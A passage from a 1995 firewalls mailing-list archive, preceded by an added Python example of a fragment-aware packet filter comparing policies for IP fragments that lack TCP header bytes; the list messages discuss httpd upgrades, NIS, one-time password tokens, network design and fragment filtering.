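Danny Boulet's description of how ipfirewall handles fragments above (port and SYN/ACK checks applied only to the first fragment, and the packet rejected if that fragment does not carry the bytes the check needs) is easiest to see with packets in hand. The following is an added example, not ipfirewall's code or any code from the list: it decodes the fragment fields of an IPv4 header, evaluates a small rule list, and goes a step beyond the post by making the handling of missing header bytes a policy, so the described "reject" behaviour can be compared with the alternative of letting such a rule simply fail to match and judging it on whichever fragment carries the bytes. The packets, addresses (RFC 5737 ranges), rule list and names (`Packet`, `Rule`, `filter_packet`, `demo`) are all constructed for the example.

```python
"""Fragment-aware packet filter (an added example, not ipfirewall's own code).
Policy for header bytes (ports, TCP flags) that the fragment in hand lacks:
  "reject"   port/flag rules apply to the first fragment only; missing bytes
             mean the packet is rejected (the ipfirewall rule described above).
  "no_match" the rule simply fails to match here and is judged on whichever
             fragment does carry the bytes.  Addresses are ignored for brevity."""
import struct
from dataclasses import dataclass
from typing import Optional

IPPROTO_TCP, TCP_SYN, TCP_ACK = 6, 0x02, 0x10
MISSING = object()  # sentinel: the rule needed bytes this fragment lacks


@dataclass
class Packet:
    proto: int
    frag_offset: int        # byte offset of this fragment within the datagram
    more_fragments: bool
    payload: bytes          # everything after the IP header

    def transport_byte(self, n: int) -> Optional[int]:
        """Byte n of the transport header if this fragment carries it, else None."""
        rel = n - self.frag_offset
        return self.payload[rel] if 0 <= rel < len(self.payload) else None


def parse_ipv4(raw: bytes) -> Packet:
    # version/IHL, TOS, total length, id, flags+offset, TTL, protocol
    ver_ihl, _, total_len, _, flags_frag, _, proto = struct.unpack("!BBHHHBB", raw[:10])
    return Packet(proto, (flags_frag & 0x1FFF) * 8, bool(flags_frag & 0x2000),
                  raw[(ver_ihl & 0x0F) * 4:total_len])


@dataclass
class Rule:
    action: str                 # "accept" or "reject"
    proto: Optional[int] = None
    dport: Optional[int] = None
    syn_only: bool = False      # TCP connection attempt: SYN set, ACK clear


def rule_matches(rule: Rule, pkt: Packet):
    """True, False, or MISSING when the bytes the rule needs are not in this fragment."""
    if rule.proto is not None and pkt.proto != rule.proto:
        return False
    if rule.dport is not None:
        hi, lo = pkt.transport_byte(2), pkt.transport_byte(3)
        if hi is None or lo is None:
            return MISSING
        if (hi << 8 | lo) != rule.dport:
            return False
    if rule.syn_only:
        if pkt.proto != IPPROTO_TCP:
            return False
        flags = pkt.transport_byte(13)
        if flags is None:
            return MISSING
        if not flags & TCP_SYN or flags & TCP_ACK:
            return False
    return True


def filter_packet(rules, pkt: Packet, policy: str = "reject") -> str:
    """First matching rule wins; anything unmatched is rejected."""
    non_first = pkt.frag_offset > 0
    for rule in rules:
        needs_header = rule.dport is not None or rule.syn_only
        if policy == "reject" and needs_header and non_first:
            continue  # port/flag rules are only applied to the first fragment
        m = rule_matches(rule, pkt)
        if m is MISSING:
            if policy == "reject":
                return "reject"
            continue
        if m:
            return rule.action
    return "reject"


# Constructed sample traffic: 20-byte headers, zero checksums, RFC 5737 addresses.
def build_ipv4(proto, frag_offset, more, payload):
    flags_frag = (0x2000 if more else 0) | (frag_offset // 8)
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, flags_frag,
                       64, proto, 0, bytes([192, 0, 2, 10]), bytes([198, 51, 100, 1])) + payload


def build_tcp(sport, dport, flags, data=b""):
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0) + data


RULES = [
    Rule("accept", proto=IPPROTO_TCP, dport=25),       # SMTP in to the bastion
    Rule("reject", proto=IPPROTO_TCP, syn_only=True),  # no other inbound connection attempts
    Rule("accept", proto=IPPROTO_TCP),                 # the rest of established TCP flows
]


def demo(policy: str = "reject"):
    syn23, syn25 = build_tcp(40000, 23, TCP_SYN), build_tcp(40001, 25, TCP_SYN)
    ack = build_tcp(40002, 1234, TCP_ACK, b"x" * 16)
    samples = {
        "whole syn to 23": build_ipv4(IPPROTO_TCP, 0, False, syn23),
        "whole syn to 25": build_ipv4(IPPROTO_TCP, 0, False, syn25),
        "first frag, whole header": build_ipv4(IPPROTO_TCP, 0, True, syn23),
        "tiny first frag, no flags": build_ipv4(IPPROTO_TCP, 0, True, syn23[:8]),
        "second frag carrying flags": build_ipv4(IPPROTO_TCP, 8, True, syn23[8:]),
        "trailing data frag": build_ipv4(IPPROTO_TCP, 24, False, ack[24:]),
    }
    return {name: filter_packet(RULES, parse_ipv4(raw), policy) for name, raw in samples.items()}
```

The interesting rows are the 8-byte first fragment and the second fragment that carries the TCP flags. Under the "reject" policy the tiny first fragment is dropped because the SYN/ACK check cannot be made, and the later fragments pass only the protocol rule. Under "no_match" the tiny first fragment is accepted (no rule can say it is a connection attempt) and the SYN is caught on the second fragment instead, so the two policies block the same connection attempt but differ in which fragment they drop and in what they let through before deciding.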
From firewalls-owner Tue May 9 14:04:21 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29641 for firewalls-outgoing; Tue, 9 May 1995 13:04:42 -0700
Received: from iss.net (iss.iss.NET [204.241.60.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA29636 for ; Tue, 9 May 1995 13:04:38 -0700
Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id QAA21275 for firewalls@greatcircle.com; Tue, 9 May 1995 16:20:17 -0700
From: Christopher Klaus
Message-Id: <199505092320.QAA21275@iss.net>
Subject: NCSA 1.4 Released
To: firewalls@greatcircle.com
Date: Tue, 9 May 1995 16:20:16 +1494730 (PDT)
X-Mailer: ELM [version 2.4 PL20]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 799
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

NCSA version 1.4 was released last week and might be a good idea to install if you are running NCSA 1.3 or below. NCSA 1.3 had several vulnerability bugs that allow intruders to gain remote access. Since some firewalls allowed http through to a web server, it would be a very good idea to insure you aren't vulnerable.

It is available at ftp.ncsa.uiuc.edu.

Some recommendations when setting up a httpd server is make sure it is running as nobody in the configuration files and if possible, run it in a chroot environment.

Cheers,
Christopher

--
Christopher William Klaus                 Voice: (404)441-2531. Fax: (404)441-2431
Internet Security Systems, Inc.
Computer Security Consulting              2000 Miller Court West, Norcross, GA 30071
========================< http://iss.net/~iss >=========================

From firewalls-owner Tue May 9 14:39:59 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29566 for firewalls-outgoing; Tue, 9 May 1995 13:01:28 -0700
Received: from i17linuxb.ists.pwr.wroc.pl (i17linuxb.ists.pwr.wroc.pl [156.17.35.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA29561 for ; Tue, 9 May 1995 13:01:22 -0700
Received: (from marekm@localhost) by i17linuxb.ists.pwr.wroc.pl (8.6.12/8.6.9) id WAA18835; Tue, 9 May 1995 22:00:46 +0200
From: Marek Michalkiewicz
Message-Id: <199505092000.WAA18835@i17linuxb.ists.pwr.wroc.pl>
Subject: Re: Linux as multi-homed firewall... (fwd)
To: avalon@coombs.anu.edu.au (Darren Reed)
Date: Tue, 9 May 1995 22:00:46 +0200 (MET DST)
Cc: firewalls@greatcircle.com
In-Reply-To: <199505030854.BAA18625@miles.greatcircle.com> from "Darren Reed" at May 3, 95 06:56:28 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 945
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I posted this mail elsewhere, and I'm doing it again here for user
> education. Sorry to those who see it twice. Maybe I should/could post
> it to bugtraq (even instead of), but the point I'm trying to make is
> one centred on bugs, but on choice of software for firewalls and the
> quality thereof. Someone who uses linux might want to file a bug
> report if they think it's serious enough.

This bug is fixed now, see ftp://ftp.linux.org.uk/pub/tmp/ipsizefix-1.2.8 for a patch.

No OS is completely bug free, and we all know that. It is easy to just complain that "Linux is buggy" but, unfortunately, this doesn't make it any less buggy...
Instead, please report bugs in Linux to the appropriate mailing lists:

    linux-net@vger.rutgers.edu
    linux-kernel@vger.rutgers.edu

[opinions about Linux and Linux users deleted]
[Linux and *BSD IP source code fragments deleted]

Regards,

--
Marek Michalkiewicz

From firewalls-owner Tue May 9 14:51:13 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA00518 for firewalls-outgoing; Tue, 9 May 1995 13:48:44 -0700
Received: from ecua.net.ec (ecua.net.ec [157.100.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA00507 for ; Tue, 9 May 1995 13:48:37 -0700
Received: by ecua.net.ec (AIX 3.2/UCB 5.64/4.04) id AA05932; Tue, 9 May 1995 15:43:24 -0500
X-Nupop-Charset: English
Date: Tue, 9 May 1995 15:37:36 -0500 (EST)
From: "Mauricio A. Echeverr!a."
Reply-To: mae@gu.pro.ec
Message-Id: <56261.mae@gu.pro.ec>
To: firewalls@GreatCircle.com
Subject: Fw: RE: Thought this was something you were doing, came through the mail...Fw: distributed passwd program
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

------------------------------
From: Nigel M Evans
Tue, 09 May 1995 15:40:34 GMT
To: mae@gu.pro.ec
Subject: RE: Thought this was something you were doing, came through the mail...Fw: distributed passwd program

Rufus,

How are you old bean - I was mystified to receive mail from gu.pro.ec - where on earth is that?

Distributed password is achieved using NIS (formerly called Yellow Pages or yp). Good news is it's free because it is incorporated in all UNIX o/s, bad news is it's not very secure, but I think it's OK on a LAN providing that LAN is adequately secured from the Internet (firewall ...)

You need to choose a yp server, suggest find out how easy it is on the various flavours of UNIX you've got by reading docn/man pages (man -k yp) or calling suppliers. On AIX its menu driven from smit, on others you need lots of commands. Also pick a machine that won't be rebooted or shutdown more often than can be helped.
Then put definitive list of users/passwds/uid/gid onto server machine.

Then introduce clients one by one - may need to do a lot of chown/chgrp of files if gids/uids weren't consistent before. Method varies with o/s, AIX smit, some are ypinit, some need reboot ...

Let me know if you have any more specific requests, also let me have a few lines of news for MAIL$ALL!

Nigel

From firewalls-owner Tue May 9 15:00:11 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA01161 for firewalls-outgoing; Tue, 9 May 1995 14:19:11 -0700
Received: from [198.102.244.36] (quadra.greatcircle.com [198.102.244.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA01156; Tue, 9 May 1995 14:19:07 -0700
X-Sender: brent@miles.greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 9 May 1995 14:19:54 -0800
To: Christopher Klaus , firewalls@greatcircle.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: NCSA 1.4 Released
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 12:36 PM 8/10/93, Christopher Klaus wrote:
>NCSA version 1.4 was released last week and might be a good idea to
>install if you are running NCSA 1.3 or below. NCSA 1.3 had several
>vulnerability bugs that allow intruders to gain remote access.
>Since some firewalls allowed http through to a web server, it would be
>a very good idea to insure you aren't vulnerable.
>
>It is available at ftp.ncsa.uiuc.edu.
>
>Some recommendations when setting up a httpd server is make sure it is
>running as nobody in the configuration files and if possible, run it
>in a chroot environment.

NCSA _what_? HTTP server? Mosaic? Telnet for Mac or Windows? NCSA (the National Center for Supercomputer Applications) produces _lots_ of different software packages.
-Brent

----------------------------------------------------------------------
For info about the Internet Security Firewalls Tutorial and a schedule
of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM
----------------------------------------------------------------------
Brent Chapman                                   Great Circle Associates
Brent@GreatCircle.COM                           1057 West Dana Street
+1 415 962 0841                                 Mountain View, CA 94041

From firewalls-owner Tue May 9 15:25:55 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29779 for firewalls-outgoing; Tue, 9 May 1995 13:09:50 -0700
Received: from SHRMED.COM (shrmed.com [199.29.63.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA29772 for ; Tue, 9 May 1995 13:09:46 -0700
Received: from SYS068 by SHRMED.COM (PMDF V4.2-12 #4739) id <01HQAZVXH06O000BDO@SHRMED.COM>; Tue, 9 May 1995 16:08:59 EDT
Received: from MR.SHRMED.COM by OASYS.SHRMED.COM (PMDF V4.2-12 #4739) id <01HQAZTH6YGG8WW06X@OASYS.SHRMED.COM>; Tue, 9 May 1995 16:07:07 EASTERN
Received: with PMDF-MR; Tue, 9 May 1995 16:05:22 EASTERN
Alternate-recipient: prohibited
Disclose-recipients: prohibited
Date: Mon, 8 May 1995 12:31:00 EASTERN
From: Kevin DiMichele
Subject: Private internet security
To: firewalls%GreatCircle.com%INTERNET@MR.SHRMED.COM
Message-id: <01HQAZTO03OW8WW06X@MR.SHRMED.COM>
MIME-version: 1.0
Content-type: TEXT/PLAIN; CHARSET=US-ASCII
Content-transfer-encoding: 7BIT
Posting-date: Tue, 9 May 1995 10:49:00 EASTERN
Importance: normal
Priority: normal
X400-MTS-identifier: [;22506190505991/685849@SYS099]
A1-type: MAIL
Hop-count: 0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Please review the following scenario:

    -------------          -----           ------------
    | Corporate |  <-->    |  ?  |  <--->  | Customer |
    |  Network  |          -----           |  Network |
    -------------                         >------------<
          |                               /            \
        ----                     ----------        ----------
       | FW |                    | Customer |<    >| Customer |
        ----                     ----------        ----------
          |
     ----------
     | Internet |
     ----------

The protocol from the Corporate Network to the Customer Network is TCP/IP only. The Corporate Network utilizes an unregistered address, as per RFC 1597. We have installed the Janus Firewall for our Internet connection. Support reps need to get to the Customer premise networks via the Customer Network.

The Customer Network exists today as a large SNA private network (mainframe resources shared by approx. 700 customer sites). As we move towards client/server our data center will house applications running on unix boxes, VMS boxes, NetWare boxes, and NT boxes, in addition to the mainframes. These new hosts will act in both single host/multiple customers and single host/single customer configurations. The transport from a Customer to the Customer Network will be SNA and TCP/IP.

Questions:

1. Since we build/manage the Customer Network, is the filtering in the routers between a Customer and the Customer Network sufficient for security (eg. Can customer A be secure from Customer B, and vice-versa)? Or, are firewalls necessary in addition to the routers?

2. Depending on the above answer, do we need one firewall or many (ie. one between the Customer Network and Customers or one between each Customer and the Customer Network)?

3. Again, depending on the answer to (1), are COTS firewalls easily capable of providing proxy services for applications such as SQL, or is the TIS FWTK the right choice?

4. We are planning on implementing a NAT in the box marked with the question mark because we utilize an unregistered address on the Corporate Network, as per RFC1597, and registered addresses on the Customer Network. Depending on the answers to question (1), do we need to install a Firewall (ie. not just a NAT) between a Customer and the Customer Network?
Any input would be greatly appreciated.

Kevin

Please respond via E-Mail: Kevin.DiMichele@shrmed.com

From firewalls-owner Tue May 9 15:26:07 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA01310 for firewalls-outgoing; Tue, 9 May 1995 14:26:09 -0700
Received: from iss.net (iss.iss.NET [204.241.60.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA01300; Tue, 9 May 1995 14:26:02 -0700
Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id RAA21797; Tue, 9 May 1995 17:41:44 -0700
From: Christopher Klaus
Message-Id: <199505100041.RAA21797@iss.net>
Subject: Re: NCSA 1.4 Released
To: Brent@GreatCircle.COM (Brent Chapman)
Date: Tue, 9 May 1995 17:41:43 +1494730 (PDT)
Cc: cklaus@iss.net, firewalls@GreatCircle.COM
In-Reply-To: from "Brent Chapman" at May 9, 95 02:19:54 pm
X-Mailer: ELM [version 2.4 PL20]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1249
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> At 12:36 PM 8/10/93, Christopher Klaus wrote:
> >NCSA version 1.4 was released last week and might be a good idea to
> >install if you are running NCSA 1.3 or below. NCSA 1.3 had several
> >vulnerability bugs that allow intruders to gain remote access.
> >Since some firewalls allowed http through to a web server, it would be
> >a very good idea to insure you aren't vulnerable.
> >
> >It is available at ftp.ncsa.uiuc.edu.
> >
> >Some recommendations when setting up a httpd server is make sure it is
> >running as nobody in the configuration files and if possible, run it
> >in a chroot environment.
>
> NCSA _what_? HTTP server? Mosaic? Telnet for Mac or Windows? NCSA (the
> National Center for Supercomputer Applications) produces _lots_ of
> different software packages.
Since within my message I referenced httpd several times, I thought it was self-explanatory, but if not, and to make sure we have no doubt, I was talking about the NCSA 1.4 httpd server.

Cheers,
Christopher

--
Christopher William Klaus                 Voice: (404)441-2531. Fax: (404)441-2431
Internet Security Systems, Inc.           Computer Security Consulting
2000 Miller Court West, Norcross, GA 30071
========================< http://iss.net/~iss >=========================

From firewalls-owner Tue May 9 15:39:24 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA03330 for firewalls-outgoing; Tue, 9 May 1995 15:27:28 -0700
Received: from ecua.net.ec (ecua.net.ec [157.100.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA03320 for ; Tue, 9 May 1995 15:27:22 -0700
Received: by ecua.net.ec (AIX 3.2/UCB 5.64/4.04) id AA14810; Tue, 9 May 1995 17:21:52 -0500
X-Nupop-Charset: English
Date: Tue, 9 May 1995 17:16:07 -0500 (EST)
From: "Mauricio A. Echeverr!a."
Reply-To: mae@gu.pro.ec
Message-Id: <62172.mae@gu.pro.ec>
To: Firewalls@GreatCircle.Com
Subject: Previous mail
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This message was sent due to a glitch in my mail system. Apologies to all. It was destined to be edited and sent as a reply to the person who asked about using the same password file across all his unix machines. Unfortunately mail lost in the glitch means I no longer have the address to go with the reply.

Sorry again for any inconvenience caused,

Rufus, Consulting at Consulta...
A bear of Very little brain.
From firewalls-owner Tue May 9 16:06:22 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA03546 for firewalls-outgoing; Tue, 9 May 1995 15:35:07 -0700
Received: from uu6.psi.com (uu6.psi.com [38.145.155.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA03540 for ; Tue, 9 May 1995 15:35:03 -0700
Received: from fcbbs.UUCP by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; id AA29372 for ; Tue, 9 May 95 18:26:19 -0400
Received: from KPMG (Radnor) (FirstClass[2000111]) by fcbbs.ss.kpmg.com (PostalUnion/UUCP 1.0.9a) id AA2000111.2882888131; Tue, 09 May 1995 17:24:01 EST
Message-Id: <1995May09.181531.2882888131@fcbbs.ss.kpmg.com>
To: Firewalls@greatcircle.com
From: Post_Office@fcbbs.ss.kpmg.com
Organization: Strategic Services of KPMG Peat Marwick
Date: Tue, 09 May 1995 18:15:31 EST
Subject: NDN: Firewalls-Digest V4 #293
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sorry. Your message could not be delivered to:

Michael VanStrien (-49)

***************************************************************************
This e-mail message was sent from the KPMG Knowledge Manager. The information contained in this e-mail message is privileged and confidential. It is intended for the use of the addressee listed above.
Technical Support (610) 995-4419
***************************************************************************

From firewalls-owner Tue May 9 16:20:49 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA04199 for firewalls-outgoing; Tue, 9 May 1995 15:53:22 -0700
Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA04188 for ; Tue, 9 May 1995 15:53:18 -0700
Received: from [198.115.177.226] (slip-0-26.shore.net) by northshore.ecosoft.com with SMTP id AA28671 (5.67a/IDA-1.5 for ); Tue, 9 May 1995 18:53:43 -0400
Message-Id: <199505092253.AA28671@northshore.ecosoft.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 8 May 1995 17:58:40 -0500
To: firewalls@greatcircle.com
From: vin@shore.net (Vin McLellan)
Subject: Re: One Time Password Tokens
Cc: ken@vnet.ibm.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ken Paquette queried:

>Or does anybody have any information on
>CRYPTOCard, Inc.
>1649 Barclay Blvd.
>Buffalo Grove, IL.

=================

One helpful source:

Arnold Consulting, Inc.
2530 Targhee Street, Madison, Wisconsin 53711-5491 U.S.A.
Phone : 608-278-7700
Fax: 608-278-7701
Email: Stephen.L.Arnold@Arnold.Com
Product: CRYPTOCard.

Suerte,

_Vin

--
Vin McLellan +The Privacy Guild+ USA Tel. (617) 884-5546
Mail: 53 Nichols St., Chelsea, Ma.
02150
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

From firewalls-owner Tue May 9 16:40:20 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA04238 for firewalls-outgoing; Tue, 9 May 1995 15:53:41 -0700
Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA04226 for ; Tue, 9 May 1995 15:53:37 -0700
Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8yAK-0002JZC; Tue, 9 May 95 15:54 PDT
Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA22749; Tue, 9 May 1995 15:54:09 +0800
Date: Tue, 9 May 1995 15:54:09 +0800
From: patrick@oes.amdahl.com (Patrick Horgan)
Message-Id: <9505092254.AA22749@brittany.oes.amdahl.com>
To: amolitor@anubis.network.com, swb@aurora.phys.utk.edu
Subject: Re: Formal methods (formerly 'Source Code')
Cc: firewalls@greatcircle.com
X-Sun-Charset: US-ASCII
content-length: 1011
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> There's a big difference between proof and truth which stems from the
> assumptions taken as axiomatically true a priori. Regarding firewalls it
> implies that no matter how well the if-then chain of logic proves things
> are safe the truth is that software has bugs.
>
>

Oh please, couldn't we let this thread die? It's not providing us with anything of any value anymore.

Patrick

 _______________________________________________________________________
/ These opinions are mine, and not Amdahl's (except by coincidence;).   \
|                                                    (\                 |
| Patrick J. Horgan       Amdahl Corporation          \\   Have         |
| patrick@amdahl.com      1250 East Arques Avenue      \\ _ Sword       |
| Phone : (408)992-2779   P.O.
Box 3470 M/S 316        \\/  Will        |
| FAX   : (408)773-0833   Sunnyvale, CA 94088-3470    _/\\  Travel      |
\___________________________O16-2294________________________\)__________/

From firewalls-owner Tue May 9 17:39:19 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07230 for firewalls-outgoing; Tue, 9 May 1995 17:22:45 -0700
Received: from ford.gbnet.org (ford.gbnet.org [192.188.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA07225 for ; Tue, 9 May 1995 17:22:42 -0700
Received: (from steve@localhost) by ford.gbnet.org (8.6.12/8.6.12) id BAA26830; Wed, 10 May 1995 01:22:51 +0100
From: Steve Kennedy
Message-Id: <199505100022.BAA26830@ford.gbnet.org>
Subject: Re: One Time Password Tokens
To: ken@VNET.IBM.COM (Ken Paquette)
Date: Wed, 10 May 1995 01:22:51 +0100 (BST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9505091949.AA36816@btv.ibm.com> from "Ken Paquette" at May 9, 95 03:49:17 pm
X-Mailer: ELM [version 2.4 PL24alpha3]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 709
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

According to Ken Paquette
> Or does anybody have any information on
> CRYPTOCard, Inc.
> 1649 Barclay Blvd.
> Buffalo Grove, IL.

err sort of. They make a VERY nice card, can store multiple PINs, then challenge/response DES card. You can also CHANGE the batteries ....

I'll try and dig out the details tomorrow ...
Steve

--
home  steve@gbnet.org       * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU
work  steve@demon.net       * tel +44-(0)171 483 1169  FAX +44-(0)181 444 6103
www   http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500
bits  steve@gbnet.net       * GSM data @2400 0802-449500 @9600 449501 fax 449502
Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk)

From firewalls-owner Tue May 9 18:09:25 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07729 for firewalls-outgoing; Tue, 9 May 1995 17:56:55 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA07723 for ; Tue, 9 May 1995 17:56:51 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA18353; Tue, 9 May 95 20:46:17 -0400
Date: Tue, 9 May 95 20:46:17 -0400
Message-Id: <9505100046.AA18353@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Civil liability
Sender: firewalls-owner@Gre atCircle.COM
Precedence: bulk

>We are analyzing the potential costs of a security breach. One of the
>questions we are considering is the liability that may be incurred with
>various types of unauthorized behavior.

Not a lawyer (yet) but some phrases do come to mind: "culpable negligence" is the first, "aiding and abetting" is another, "maintaining an attractive nuisance" is a third, "failure to exercise due care" for four. Depends on whether the shyster is paid by the state, a victim, or a shareholder.

Might also consider that in a civil suit, all that is necessary is for someone to demonstrate injury (not necessarily physical) and for you to have the "deep pockets".

Isn't this a wonderful country ?
Warmly, Padgett From firewalls-owner Tue May 9 18:39:29 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA08105 for firewalls-outgoing; Tue, 9 May 1995 18:18:23 -0700 Received: from silas.cc.monash.edu.au (silas.cc.monash.edu.au [130.194.1.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA08100 for ; Tue, 9 May 1995 18:18:19 -0700 Received: (sajoh3@localhost) by silas.cc.monash.edu.au (8.6.10/8.6.4) id LAA29850; Wed, 10 May 1995 11:18:47 +1000 Date: Wed, 10 May 1995 11:18:45 +1000 (EST) From: Mr SA Johnson Subject: Advice For Setting Up A Firewall. - Please Help. To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I'm in the decision making process of which firewall software I go with. Now I am also very flexable when it comes to a particular Operating System. Does anyone have any advice on which Unix Operating Systems have coped well in the past with Firewalls / software. Is there any particular OS that is favored by the Firewall community for being more secure or having more firewall and security applications developed for it? I am currently reading the FAQ and have disseminated much information from anonymous ftp sites but it really doesn't tell me what the community is doing and which software does what and what software is better than others. Any comments / advice on this would be appreciated. 
Regards
Simon Johnson

From firewalls-owner Tue May 9 18:52:37 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA08122 for firewalls-outgoing; Tue, 9 May 1995 18:20:02 -0700
Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA08117 for ; Tue, 9 May 1995 18:19:58 -0700
Received: from anubis.network.com (anubis-e3.network.com) by nsco.network.com (4.1/1.34) id AA01981; Tue, 9 May 95 20:38:16 CDT
Received: from blefscu.network.com by anubis.network.com (4.1/SMI-4.1) id AA20766; Tue, 9 May 95 20:19:31 CDT
Date: Tue, 9 May 95 20:19:31 CDT
From: amolitor@anubis.network.com (Andrew Molitor)
Message-Id: <9505100119.AA20766@anubis.network.com>
To: firewalls@greatcircle.com
Subject: Re: IP packet filtering...
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What I've done for the packet filtering work I am doing is this: Any
pattern which requires data not present in the datagram in hand does not
match. Thus, if the TCP flags are not in the first datagram, a filter of
the form:

	.. stuff .. tcp_connect_request ; .. stuff ..

will not do to the first fragment, since it is logically NOT a
tcp_connect_request. The flags will show up in, say, the 2nd frag,
whereupon if the SYN is set and the ACK is not, the actions will be taken
with respect to that packet.

This seemed to me to be the easiest solution, it's relatively easy to use
an abstraction that understands the idea of 'Nth byte after the beginning
of the transport layer header' and to teach that abstraction about
fragments is a no-brainer, so we handle flags by simply asking for the
13th byte, and if it's not there, the answer to all questions about that
byte ('is it between 0 and 255?' 'is the 3rd bit set?') is 'no'.

I think this does make the semantics a little complicated, but not any
more complicated than anything else -- the fact is that IP fragments and
you have to deal with that if you don't want to do reassembly just to
filter.

Andrew

From firewalls-owner Tue May 9 22:39:13 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA11291 for firewalls-outgoing; Tue, 9 May 1995 22:16:10 -0700
Received: from gateway.wipsys.soft.NET (gateway.wipsys.soft.net [164.164.1.25]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA11286 for ; Tue, 9 May 1995 22:16:05 -0700
Received: (from acharya@localhost) by gateway.wipsys.soft.NET (8.6.9/8.6.9) id FAA01345 for firewalls@greatcircle.com; Wed, 10 May 1995 05:24:12 GMT
From: Atul Acharya
Message-Id: <199505100524.FAA01345@gateway.wipsys.soft.NET>
Subject: Off topic: Directory services, anybody.. ?
To: firewalls@greatcircle.com
Date: Wed, 10 May 1995 10:54:11 +0530 (IST)
Organisation: Wipro Systems
Address: 88, M.G. Road, Bangalore, 560-001, India
Phone: 91-80-558-6202, 559-4028
FAX: 91-80-558-7984
X-Mailer: ELM [version 2.4 PL22]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
